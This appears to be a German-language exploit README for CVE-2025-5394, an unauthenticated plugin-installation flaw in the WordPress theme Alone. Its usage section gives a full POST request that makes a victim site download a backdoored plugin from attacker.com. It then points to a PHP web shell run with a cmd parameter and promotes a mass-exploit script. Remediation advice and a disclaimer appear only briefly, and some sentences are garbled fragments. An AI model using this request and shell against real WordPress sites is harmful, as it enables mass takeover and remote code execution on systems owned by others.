
Alone – Wohltätigkeits-Multipurpose-Nonprofit-WordPress-Theme <= 7.8.3 – Fehlende Autorisierung zu nicht authentifiziertem beliebigen Dateiupload via Plugin-Installation
🔥 Zusammenfassung der Sicherheitslücke
Das WordPress-Theme Alone in Versionen <= 7.8.3 ist anfällig für eine nicht authentifizierte willkürliche Datei-Upload-Sicherheitslücke. Dieser Fehler ermöglicht es nicht authentifizierten Angreifern, beliebige Plugin-ZIP-Dateien von entfernten URLs über einen ungeschützten AJAX-Endpunkt hochzuladen und zu installieren – was zu Remote Code Execution (RCE) durch das Bereitstellen von hintertürten Plugins führt.
Diese Sicherheitslücke resultiert aus der Funktion beplus_import_pack_install_plugin, die über wp_ajax_nopriv_ ohne Authentifizierungs- oder Berechtigungsprüfungen öffentlich zugänglich gemacht wird. Die Funktion installiert und aktiviert ein Plugin von einer vom Benutzer bereitgestellten URL.
🔍 Betroffenes Theme
🧪 Exploit-Funktionen
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 Forscher
🚀 Verwendung
Bereiten Sie eine bösartige Plugin-ZIP-Datei vor, die auf einem von Ihnen kontrollierten Server gehostet wird.
Plugin Name:) und eine PHP-Hintertür (z. B. bk.php) enthalten.Erstellen Sie die folgende POST-Anfrage:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
Bei Erfolg wird das Plugin installiert und aktiviert. Greifen Sie auf Ihre Shell zu unter:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 Massen-Exploit-Skript Dieses Repository enthält ein Massen-Exploit-Tool mit:
result.txtSiehe mass_beplus_exploit.py für Details.
🛠 Empfehlungen zur Behebung
wp_ajax_nopriv_beplus_import_pack_install_plugin entfernen oder absichern.current_user_can('install_plugins'))🔒 Haftungsausschluss:
Diese Informationen werden ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Unbefugter Zugriff oder unbefugte Nutzung von Computersystemen ist illegal und unethisch.
📚 Referenz:
CVE: CVE-2025-5394
Researcher: Thai An